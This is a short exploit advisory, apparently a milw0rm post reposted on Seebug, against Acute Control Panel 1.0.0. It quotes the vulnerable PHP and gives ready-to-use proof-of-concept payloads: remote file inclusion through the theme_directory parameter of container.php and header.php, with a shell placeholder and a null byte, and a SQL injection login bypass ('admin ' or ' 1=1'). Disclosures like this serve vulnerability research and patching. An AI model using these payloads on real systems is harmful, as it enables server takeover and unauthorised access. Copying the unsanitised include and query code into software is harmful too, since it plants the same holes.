############################################################### [+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass) [+] Discovered By SirGod [+] www.mortal-team.org [+] www.h4cky0u.org ############################################################### [+] Remote File Inclusion Vulnerable code in container.php ----------------------------------------------------------- <?php include_once($theme_directory."/sidebar.php"); ?> ----------------------------------------------------------- PoC : http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Vulnerable code in header.php -------------------------------------------------------------- <?php include_once($theme_directory."/navigation.php"); ?> -------------------------------------------------------------- PoC : http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [+] SQL Injection (Auth Bypass) Vulnerable code in login.php -------------------------------------------- $query = mysql_query("SELECT id,username,password,email,fullname,permissions FROM `users` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error()); -------------------------------------------- PoC : Username : admin ' or ' 1=1 Password : anything or nothing ################################################################ # milw0rm.com [2009-03-26]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论